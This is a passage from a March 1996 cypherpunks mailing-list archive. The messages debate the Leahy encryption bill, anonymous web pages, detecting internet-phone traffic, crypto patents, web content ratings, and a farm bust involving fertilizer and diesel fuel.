# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Townsend <townsend@smokin.fly.net>
Date: Mon, 11 Mar 1996 08:16:33 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Leahy's guillotine.
In-Reply-To: <m0tvZUN-0008zCC@pacifier.com>
Message-ID: <Pine.LNX.3.91.960309231319.18047D-100000@smokin.fly.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 9 Mar 1996, jim bell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> To:  All
> 
> 
> Recent Senate crypto bill
>  Mr. LEAHY (for himself, Mr. BURNS, and MRS. MURRAY) introduced the
>   following bill; which was read twice and referred to the Committee
> 
> [stuff deleted]
> 
> 2804. Unlawful use of encryption to obstruct justice
> 
>   Whoever willfully endeavors by means of encryption to obstruct,
>    impede, or prevent the communication of information in furtherance
>    to a felony which may be prosecuted in a court of the United States,
>    to an investigative or law enforcement officer shall...
> 
> 
> I think we may reasonably assume that this section was very carefully 
> written, and thus it may contain meanings (or avoid containing meanings) 
> that only a careful reading will disclose.  
> 
> Contrary to some other sloppy  interpretations that I've seen here recently 
> from organizations that ought to know better, I see nothing in this section 
> that limits the prosecution on this law to people who are actually 
> participating in a crime.  This distinction is vital.   While the sentence 
> is not diagrammed, it appears to be the INFORMATION which is in "furtherance 
> to a felony," not the "obstructing" of that communication.  The implication 
> is that it is not necessary that a person know the exact information 
> involved or be able to decrypt it; he needs only be deliberately using 
> encryption to prevent the knowledge of what the information is about, or its 
> routing.  (As in an encrypted anonymous remailer, for instance.) 


???  Your third sentence doesn't make any sense.  While I agree with your 
position, why would it *possibly* be a crime to interefere with felonious 
communcations?  The lanuguage is lamentably unambiguous about the
fact that it is the obstruction and not the information that is
in furtherance of a felony... 

 
> Moreover, the errors among the organizations that are now apparently 
> declaring their general support for this amendment are apparently based on a 
> false view of the effects of this section.  
> 
> Aside from this, it isn't clear what is meant by the phrase, "obstruct, 
> impede, or prevent the communication of information in furtherance to a 
> felony."    An obvious problem is this:  How will they know if the use of 
> encryption actually had that effect?  If it was UNsuccessful, then obviously 
> that encryption did not prevent the government from obtaining information.  
> If it was SUCCESSFUL, then how is the government to know that the 
> communication in question was "in furtherance to a felony"?  Even if they 
> can prove the felony by other means, how can they show that the 
> communication actually had anything to do with the crime?

It is quite conceivable that an unsuccessful attempt to obstruct
justice might cause additional trouble, time, and expense to the
guys in the white hats.  Note that the language does not distinguish
between successful and unsuccessful attempts...though you're right
that it seems that only unsuccessful attempts could be verified...
the rest is clouded by your assumption that the information, rather
than the obstruction, must be in furtherance of the crime...


> 
> Another problem:  Encryption, per se, does not "prevent the communication of 
> information."  What it does, of course, is to prevent the UNDERSTANDING of 
> that information.  Do the writers of this bill intend to use this law to 
> punish the LATTER effect, rather than the former? 
> 
> Further, how is the person to be charged to know if his use of encryption 
> had the effect of "obstruct[ing], imped[ing], or prevent[ing] the 
> communication of that information?  If he encrypts a file to his hard disk, 
> and he doesn't intentionally send the file to the cops, how is he supposed 
> to anticipate that the use of encryption had this effect?  As far as HE 
> knows, it was simply his decision to not send the file to the cops; he can't 
> be expected to know that they'll show up the next morning with a search 
> warrant and take his computer, can he?  Would his refusal to provide the 
> decrypt key constitute a violation of this section?

Probably.  That's what the word "willful" is doing in there.   Read
carefully:  it's willful obstruction, not willful encryption...

I am not a lawyer, although I play one on the net.

I agree with your position, but you're not reading as closely 
as the enemy will...            

-cpt
townsend@fly.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Sun, 10 Mar 1996 15:04:31 +0800
To: cypherpunks@toad.com
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <199603100222.UAA03114@proust.suba.com>
Message-ID: <199603100645.XAA00982@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


cp@proust.suba.com (Alex Strasheim) writes:
>Has anyone ever considered setting up anonymous web sites on top of usenet?

I proposed this a couple of months ago, there should be a bit of
discussion left over in the archives. My idea was to have an account
keyed to a password - if you emailed the server with the right
password, it would take the text of your email and put it in the
specified URL. Then you can use remailers to preserve anonymity with
the server. It's sort of like the alias.c2.org accounts.

It seems like a workable, not-too-difficult idea. Not much interest in
it, though. Sameer pointed out that a full c2.org account, if used
properly, allows anonymous web pages.

>Right now a news administrator isn't held responsible of there's some
>"bad" information in his news spool -- copyright violations, obscenity,
>etc.  If the link between physically hosting a web page and being
>responsible for its contents could somehow be broken, then anonymous web
>pages would be possible.

In trying to shape the policy at various places where I've installed
web servers, I urge them to think of allowing users to post web pages
to be the same as allowing them to send email or post to Usenet.
They're all (potentially) media with lots of exposure and instiutional
identification, so why treat them differently? The argument seems to
work, and users are allowed to have their own web pages.

The problem, of course, is that people do tend to associate the
opinions in web pages to the company that owns the web server more
than they do with Usenet posts or email. Furthermore, WWW is a
permanent medium, where as email and Usenet are commonly perceived to
be transitory (this is changing).

I decided that if I were to set up an anonymous web server, I as
administrator would have to retain absolute control of what is on the
server, just to protect whomever my ISP is. The aim would be to weed
out any and all potentially illegal text: draconian, but probably
necessary to keep the remailer safe. I'd also filter out all CGI and
images over some small (icon) size. These days, I'd prevent Java and
JavaScript, too.


I'm interested in discussing implementation issues in more detail with
someone if they think this would be a fun project. I might yet get to
it myself in the next few months.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Cross <cross@math.psu.edu>
Date: Sun, 10 Mar 1996 14:00:54 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: anonymous web pages (Was: SurfWatch)
In-Reply-To: <199603100222.UAA03114@proust.suba.com>
Message-ID: <199603100450.XAA16800@hausdorff.math.psu.edu>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 16:21:25 +0800
To: privacy@ftc.gov
Subject: Re: Encrypted Communications Privacy Act of 1996 (fwd)
Message-ID: <199603100754.XAA10576@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>   S 1587 IS
>>   104th CONGRESS
>>   2d Session
>>   To affirm the rights of Americans to use and sell encryption
>>   products, to establish privacy standards for voluntary escrowed
>>   encryption systems, and for other purposes.
>>                    IN THE SENATE OF THE UNITED STATES
>>                               March 5, 1996
>>   Mr. LEAHY (for himself, Mr. BURNS, Mr. DOLE, Mr. PRESSLER, and Mrs.
MURRAY) 
                                        ^^^^^^^^
Interesting that Bob Dole is supporting it!
It's certainly not a perfect bill, and will presumably be less perfect
by the time it's passed.  But it's a nice alternative to Clinton, who
was happy to buy in to the previous Administration's anti-crypto efforts.


(I'll presumably be voting for Harry Browne or some other Libertarian,
unless I get fed up and vote for Frank Zappa or Hugh Romney; the Democrats
can look me up some year if they decide to run a genuine liberal :-)
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Mon, 11 Mar 1996 08:05:58 +0800
To: wlkngowl@unix.asb.com (Mutant Rob)
Subject: Re: FCC & Internet phones
In-Reply-To: <199603100222.VAA06105@bb.hks.net>
Message-ID: <199603100507.AAA02942@homeport.org>
MIME-Version: 1.0
Content-Type: text


Mutant Rob wrote:
| >         Q: Is it practically possible to find netphone traffic on a
| > generic network at any level above the source and target addresses?
| 
| Good question.

Presumably, the signal has a number of charictaristics.  Some of them
have a central switchboard, where preople go to set up calls.  Most
presumably use a mix of a UDP data connection and tcp for control
functions.  They all consist of high volume, long duration connections
(or data flows in the case of UDP.)  Many probably use a standardized
destination port.  They might use the urgent pointer to force data up
the stack quickly.

	In short, yes the data streams can be easily found, if one can
tap and grep a T3 in real time.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 16:34:03 +0800
To: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Subject: re: FCC & Internet phones
Message-ID: <199603100813.AAA13246@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:12 PM 3/9/96 -0500, Padgett Peterson wrote:
>  >"Long-Distance Dueling. Free Dialing Via Internet Faces a Challenge From
>  >Small Phone Firms." 
>  You seem to forget that the Internet is just about the *only* electronic 
>  communications media not controlled/licensed by the FCC in the US. The 
>  FCC also prohibits use of cryptography by those with amateur licenses.

Oh, we remember it :-).  But actually, large chunks of the Internet's
facilities _are_ on controlled or semi-controlled media, such as 
frame relay (which the Feds just insisted had to be tariffed) or
local private-line (which is often regulated by state PUCs.)
But in those cases, the regulation is at the price/quantity/schedule
layer, rather than the content layer.

And according to someone I talked to recently, the Network Access Points,
MAE-East/West, (though not CIX), are still NSF-funded, even though they're
often built
and run by folks like PacBell - I'd thought we'd gotten rid of those guys
a couple of years ago except for the NIC and Internic.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sun, 10 Mar 1996 14:30:25 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: FCC & Internet phones
Message-ID: <199603100534.AAA17091@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero <ses@tipper.oit.unc.edu> wrote:

> The real complaint of the telephone companies seems to be not that the 
> calls are free, but that the 'whatevers' are not subject to the same 
> tariff regulation that they are. I'm sure it's because they want to be 
> able to lower their fees to the same level to compete. Quit sure. 

How can one compare the fees, though?  You buy the software (or use a 
free version of similar software) and get an account with an ISP, and 
maybe an IRC-type network devoted to Internet phone.

Telephone/conferencing over the 'net is different technology than 
standard telephone.  How can they be compared? (The exception maybe 
if one can route an Internet phone call to regular phone switches.)

I notice it's the small LD companies too.  The biggies like AT&T and 
MCI are getting into the ISP business, so they probably don't feel 
threatened by it.

ObCrypto: I don't know. I'm wondering how the FCC or DT Bill will 
affect the use of uch technologies, since it's pretty easy to plug in 
good crypto.



 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 17:38:06 +0800
To: cypherpunks@toad.com
Subject: Re: News on RSA vs. Cylink Injunctions and Patents
Message-ID: <199603100911.BAA18256@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:00 PM 3/9/96 -0500, Perry wrote:
>> I'm curious, because in the past, as I understand things, RSA has
>> said that the DH patent covers El Gamal.  If RSA no longer considers
>> DH to be a valid patent, that would mean El Gamal is not patent
>> encumbered.
>It all matters very little to me, as the patents expire next year.

Yeah, but that's still a year and a half till they're gone.
Having them gone now (for some relatively small value of "now")
would be especially pleasant, because we can start totally ignoring
them (except for the RSA and Schnorr patents) rather than mostly ignoring them.

Unfortunately, the somebody-at-Siemens-in-Paderborn patent on using
Diffie-Hellman with hashed shared secrets for authentication
is (minimally) good until something like 1994+17, even though it's
so obvious to the skilled practitioner that I thought of it independently
myself.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 17:37:04 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Leahy's guillotine.
Message-ID: <199603100911.BAA18260@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Leahy et al.:
>  Whoever willfully endeavors by means of encryption to obstruct,
>   impede, or prevent the communication of information in furtherance
>   to a felony which may be prosecuted in a court of the United States,
>   to an investigative or law enforcement officer shall...

<Exonive deleted>!  

Let's look at the word "willfully".  Among other things, it implies
knowledge; under US law, to be guilty you have to know you did something
that you at least reasonably believe is an activity that you're not supposed
to do.
Yes, cops can send you email threatening to use your remailer for
felonious purposes, but if you don't know they've actually done it,
and you haven't agreed with them to provide your encryption services
in support of their felonious action, you're not a willing participant.
Especially if you've got the welcome banner on your remailer page
saying "You may not use this email encryption service for thoughtcrime,
violations of the verbal morality act, idea laundering, anti-abortion activism,
or other felonious or Un-American activities."  You're no more a willful 
participant than the guy who receives an unordered package of child pornography
mailed by a postal inspector.

Now, if they make this a felony, surely conspiracy to participate in
such activities could eventually be made illegal, and if the DemoPublicrats
get re-elected, it probably will be some day.  But this law doesn't do that yet.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 10 Mar 1996 17:37:02 +0800
To: cypherpunks@toad.com
Subject: Re: Vexatious Litigants  (was: SurfWatch)
Message-ID: <199603100912.BAA18270@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From:	IN%"janzen@idacom.hp.com"  "Martin Janzen"  9-MAR-1996 09:48:42.59
>>ObCrypto, sort of:  What if the page were retrieved through an HTTP
>>proxy which, unbeknownst to the author (and the filtering service/SW),
>>deliberately removes or alters the PICS-Label or other rating
>>information?  

Sure, you could probably write http://www.g-rated.com/.
At least with movie ratings, the MPAA has trademarked the G, PG, PG-13, R, NC-17
ratings so that producers can't self-rate their own movies (though they
can self-rate them as X.)  But you could delete the ratings.

Presumably, almost nobody in Europe is going to add these silly Yankee
rating labels to their web pages, except a few commercial content providers
who want to sell advertising or services into markets that block
un-rated web pages.  So schoolkids behind rating-mandatory sites
will have to ask their teachers why the "World-Wide-Web" is just American ---
"It's got All 50 States, Johnny!"   <Exonive deleted>!

>> Must Web authors now add a digital signature to each page (including its
rating
>> info), to prevent tampering? 

Tamper-proofing is a far more general issue than just ratings.
Most of the tampering today is either political protest (the see-your-
favorite-web-pages-after-censorship site), quasi-silliness 
(the Great Web Canadianizer, eh?), or advertising addition from commercial sites
or deletion from de-commercialization software.
Imagine if your movie rating web page gets linked up by some studio-owned
web site (www.disney.not/reviews/siskel+ebert/Rocky23 says "Two Thumbs Up!"
"Rave!")
Or your stock picking service gets arbitraged a bit on fast.make.money.com.
Or the ExonOnLine webserver starts deleting all links to unrated pages
from pages it serves.

If you don't need it now, you'll need it soon enough.

#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
# "At year's end, however, new government limits on Internet access threatened
# to halt the growth of Internet use.  [...] Government control of news media 
# generally continues to depend on self-censorship to regulate political and
# social content, but the authorities also consistently penalize those who
# exceed the permissable."  - US government statement on China...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 10 Mar 1996 14:47:10 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: SurfWatch
In-Reply-To: <ad67659f0b021004d8f2@[205.199.118.202]>
Message-ID: <Pine.BSF.3.91.960310013511.12537I-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 9 Mar 1996, Timothy C. May wrote:

> ...
> In the terms of the lawyers--from what I picked up during my time on the
> Cyberial list--a requirement that words be rated before they can be
> distributed would not pass Constitutional muster. This does not mean that
> one's words will not trigger prosecutions, lawsuits, treason trials, etc.
> What it means is that "prior restraint" is frowned upon (recall "The
> Progressive" H-bomb case of about 15 years ago, where a court subjected
> this magazine to prior restraint...a rare occurrence, later overturned. A
> more recent case involves "Business Week," and is still unresolved).
...
The Sixth Circuit recently held that the prior restraint by the idiot 
district judge was wrong.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Sun, 10 Mar 1996 15:22:20 +0800
To: cypherpunks@toad.com
Subject: Re: FCC & Internet phones
Message-ID: <v02120d00ad68230251cb@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 AM 3/10/96, Adam Shostack wrote re the Q:

>| >         Q: Is it practically possible to find netphone traffic on a
>| > generic network at any level above the source and target addresses?

>Presumably, the signal has a number of charictaristics.  Some of them
>have a central switchboard, where preople go to set up calls.  Most
>presumably use a mix of a UDP data connection and tcp for control
>functions.  They all consist of high volume, long duration connections
>(or data flows in the case of UDP.)  Many probably use a standardized
>destination port.  They might use the urgent pointer to force data up
>the stack quickly.
>
>        In short, yes the data streams can be easily found, if one can
>tap and grep a T3 in real time.

        That's a big if, given the priority such a tap would likely merit.
        Of the Mac apps I've seen (Maven, Cu-SeeMe Talk, and Netphone), the
last is by far the best. On startup it verifies registration by querying
the company's site, so it'd be easy enough to shut down at, at least for
now; but strangling it at that level would likely kill the company, which
would effectively orphan the code--a real factor, imo. In any case, there's
a crack floating around that circumvents this verification; obviously,
then, it'd also circumvent that method of enforcement.
        As for traffic characteristics, I've never seen one of these apps
work in full-duplex mode--just the allegedly fallback "push to talk" mode
(i.e., hold down the button while you yak, release it to listen), which
really changes the texture of a conversation--so the signal tends to be a
kind of high-volume call/response "negotiation" in slow-mo, with ~10-20
secs of transmission punctuated by null periods of about the same duration.
Ports are no problem, since the disassembly it'd take to rewrite the call
to another port would be minimal (and it'd be easy enough to make hack a
configurable port call to be arranged by mutual consent through plain old
UN*X Talk). The upshot being that signal analysis would be nontrivial--and,
from what I've read, the major telecom players aren't especially worried
that they'll lose business to this, so they'd likely resist getting saddled
with burdensome sniffing duties.
        And there's always PGPfone, which obviously flattens out signal
characteristics... heh heh.
        I think ACTA will make a valiant effort to ban this stuff, and the
FCC might listen--if only to safeguard its purview--but the only
"effective" way to enforce such a ban would be to impose yet another
policing duty on ISPs. Bandwidth aside, they've got better things to worry
about. And it'd be damned hard to work the public into a frenxy over free
long-distance phone calls.
        Basically, I think we got ourselves a winner.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 10 Mar 1996 15:30:43 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <960310020618_242145364@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-09 03:42:04 EST, you write:

>And the guys who just got busted for having fertilizer, diesel oil,
>and drugs on their farm had a whole three ounces of marijuana and
>personal-use quantities of crank.  Maybe they were planning to blow up
>buildings rather than stumps; but the Feds are trying to paint them
>as max evil just to build up their case.

Who says they were going to blow anything up?  It is perfectly legit for
farms to have large quantities of fertilizer around--they use it all the
time.  Same with diesel fuel--what are they supposed to run the tractors and
combines with?  Dog piss?  DUHHHH!  As far as having the instructions for
mixing them to go boom, who the hell made that a crime?  You could bust most
of the farmers in this country if you criminalize simultaneous posession of
fertilizer and diesel fuel.  Did these people ever actually mix any of the
fert. and fuel together?  Did they threaten to blow up anything?

This whole situation is nothing more than jackbooted thugs getting a rush by
stomping on people.  FTJBT

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Sun, 10 Mar 1996 15:34:53 +0800
To: cypherpunks@toad.com
Subject: Re: Another Motivation for the CDA (Federal Sentencing Guid
Message-ID: <960310020800_242145444@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-03-09 04:05:26 EST, you write:

>At  9:59 PM 3/8/96 -0800, Bill Stewart wrote:
>>The pizza guy was a thug, but twice as many third-strikers got
>>their third strike for marijuana as for all violent crimes combined.
>>I assume most of these had large quantities, possibly intended for sale,
>>and a number of them had real crimes as their previous felonies
>>rather than Prohibition-related offenses.  But you can get legally
>>serious quantities of marijuana by just growing a couple of plants.
>
>I wonder how many of these drug dealers previous "real crimes" were related
>to using violence to protect their drug business, defense which would have
>used the courts and police had drug dealing been legal.

What difference does that make?  If you are deranged enough to murder someone
because they are selling crack in your territory, you are deranged enough to
shoot your manager after getting fired from McDonalds, or to do any number of
heinous things that ahve nothing to do with drug laws.  Sick people will
still do sick things, even if some of them are legalized.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 17:02:58 +0800
To: cypherpunks@toad.com
Subject: Re: Cryptanalysis
Message-ID: <ad67d50e0d0210040718@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:37 AM 3/10/96, Adam Shostack wrote:
>Timothy C. May wrote:
>
>| cryptanalysis. (Not to sound harsh to Allen, but why would anyone ask here
>| on the list for recommendations to such a standard subject when Schneier,
>| Garfinkel, Denning, etc. all have books listed?)
>
>        Niether Schneier nor Garfinkel really talk about analysis.
>The only book I can think of is Biham's "Cryptanalysis of the DES,"
>and thats on a single technique.

I said "....all have books listed," not that they are textbooks on
cryptanalyis. My point was that Schneier, for example, has extensive
bibliographic pointers. For example, and relevant to another recent thread,
Ref. 355 (1st Ed.) is to Friedman's "The Index of Coincidence and Its
Applications in Cryptography," 1920. And more Friedman, and Biham, and even
reference to our very own Bob Baldwin's Crypt Breakers Workbench (dare I
point out that this is probably a very educational tool for those seeking
to play with cryptanalysis?).

Likewise, Garfinkel gives a bunch of pointers. (Not that I hold it out as a
textbook on crypto, but it's one of several recent semi-popular crypto
books.)

(And in recent days there have been pointers to the Aegean Park Press
series of books, available at "Computer Literacy"
(http://www.clbooks.com/), and the database may be browsed, books ordered,
etc.)

(One more note. The question that came up recently about "does anyone know
what the "index of coincidence" is?" is readily answered with Alta Vista.
More than two dozen hits, including definitions, papers, homework
assignments, etc. The point being that between the Web, search engines,
archives, FAQs, searchable library catalogs and retail bookstore databases,
and the many hundreds of books and papers listed in Schneier, there is no
reason people need to say they "can't find anything.")

>        I don't know of any books on 'applied cryptanalysis.'  The
>public knowledge is all in the heads of a few practitioners, and the
>papers they've written.
>

I think there's no single book on cryptanalysis for the various reasons
I've mentioned recently.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 10 Mar 1996 17:52:10 +0800
To: cypherpunks@toad.com
Subject: Explosives, Criminality, and Preemptive Action
Message-ID: <ad67dae60e02100466b2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:06 AM 3/10/96, JonWienke@aol.com wrote:

>Who says they were going to blow anything up?  It is perfectly legit for
>farms to have large quantities of fertilizer around--they use it all the
>time.  Same with diesel fuel--what are they supposed to run the tractors and
>combines with?  Dog piss?  DUHHHH!  As far as having the instructions for
>mixing them to go boom, who the hell made that a crime?  You could bust most
>of the farmers in this country if you criminalize simultaneous posession of
>fertilizer and diesel fuel.  Did these people ever actually mix any of the
>fert. and fuel together?  Did they threaten to blow up anything?


My personal belief, from the news reports I've read (which may be
incorrect, of course), is that the ingredients were for use in a bomb,
whether or not they'd ever have gone through with it or not. The ancillary
items found (dozens of assault rifles, weapons manuals, patriot literature,
crank, meth, etc.), and the stockpiling of ANFO precursors, suggests an
Oklahoma City-type scenario.

This is what I think was objective reality.

Now, before certain readers go ballistic, start foaming about how TCMay and
his Tentacles of Medusa are pawns of Bill and Hillary, not to mention spawn
of Satan, etc., I'm not saying that what they did is criminal. Having the
potential to build a bomb or other deadly gadget is not the same as
actually building and using one. But should law enforcement have waited
until the bomb was actually built? Or actually loaded onto a truck? Or
actually placed in a target area? Or actually detonated? Mightn't it be
argued that until the bomb actually explodes, no crime has occurred?

(A fine line. A topic oft-debated in libertarian discussion talkathons: if
you see your neighbor preparing what you think will ultimately endanger you
or your neighbors, at what point are you justified in taking premptive
action? Certain extremists argue that at no point prior to your own death,
for example, has an "assault" occurred. Less extreme folks argue that the
assault happens when your neighbor begins to turn his gun in your
direction. And extremists at the other end believe that potentially
dangerous objects must be taken away from people long before they could
ever put them to use. Ergo, gun control, restrictions on bomb-making
info/anfo, etc. I take a stance closer to the first example, though I feel
no qualms about hitting first if I really think I'm about to be attacked.)

The argument that because farmers can use these products that the use must
have been an innocent use is a weak one. Anyone with any common sense can
see what they were up to. Who's kidding whom?

But, like I said, this may not be criminal. And courts routinely have to
deal with "conspiracy" cases to decide just how real the conspiracy was. (I
don't care for "conspiracy" charges...too much chance for abuse.)

Certainly the folks in Oregon will not face much prosecution, as near as I
can figure. The weapons charges may affect their parole (some of them are
ex-cons). The drug amounts are small. And the ANFO precursors....not clear
to me at all that having these is a violation of the laws about explosives,
but maybe it is.

>This whole situation is nothing more than jackbooted thugs getting a rush by
>stomping on people.  FTJBT

Overly simplistic. Don't misunderstand me: I share your anger at Waco, Ruby
Ridge, gun confiscation, tens of thousands of laws, high taxes, etc. But I
doubt the Oregon bust was a bunch of Waco Warriors assaulting the compound
with tanks and helicopters.

--Tim May, probably just added to Jim Bell's list of people he plans to
have killed

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 11 Mar 1996 09:39:27 +0800
To: cypherpunks@toad.com
Subject: Bell, Detweiler, Ravings, and Whatnot
Message-ID: <ad67e74a0f0210044ff0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:12 AM 3/10/96, jim bell wrote:

>In short, the government is trying to head off "crypto-anarchy," which I
>guess is Tim May's trademark.  I suggest that we don't allow them to; it
>will merely make the government's eventual end even bloodier.

Not my "trademark," though it was my coinage (in 1987). I'm happy it's
gaining usage, by people as diverse as David Friedman, Dorothy Denning, and
various journalists.

(By the way, I also figured out the anonymous markets for assassinations
bit, too, in 1988, and discussed it in detail then with Eric Drexler, Marc
Stiegler, Mark Miller, Robin Hanson, and others. Several of us on the
Extropians list discussed the implications, countersteps that might be
taken, etc., several years ago. I recall incisive comments by Robin Hanson,
David Friedman, Hal Finney, Nick Szabo, and others. And on this list, the
topic was discussed a bit later. The archives may be helpful...though I'm
not sure I want to help Jim Bell figure out the holes in his logic!)

Note to Jim: Your posts are getting longer and longer, often including huge
chunks of previous posts. I doubt many of us are reading these
"novellas"...I am responding to this part of your latest massive post
because I detected my name being used. I urge you to try to limit your
quoting to about a screenfull or so...this is what a lot of experience has
said is the maximum amount of quoting people are willing to deal with in
most cases.

And your insulting comments about people whom you disagree with, or people
whom you think are not taking your ideas seriously enough, are reminiscent
of the ravings of the last victim here of late stage Detweiler's Syndrome.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Davis <eagle@armory.com>
Date: Sun, 10 Mar 1996 21:45:18 +0800
To: cypher punks <cypherpunks@toad.com>
Subject: Re: Bell, Detweiler, Ravings, and Whatnot
In-Reply-To: <ad67e74a0f0210044ff0@[205.199.118.202]>
Message-ID: <9603100533.aa15975@deepthought.armory.com>
MIME-Version: 1.0
Content-Type: text


> And your insulting comments about people whom you disagree with, or people
> whom you think are not taking your ideas seriously enough, are reminiscent
> of the ravings of the last victim here of late stage Detweiler's Syndrome.
> --Tim May

Bell's ding-a-ling aside, the active verb would be Detwielling, while the past
perfect tense is Detwielled.  
-- 
According to John Perry Barlow:                       *What is EFF?* 
"Jeff Davis is a truly gifted trouble-maker." *email <info@eff.org>*
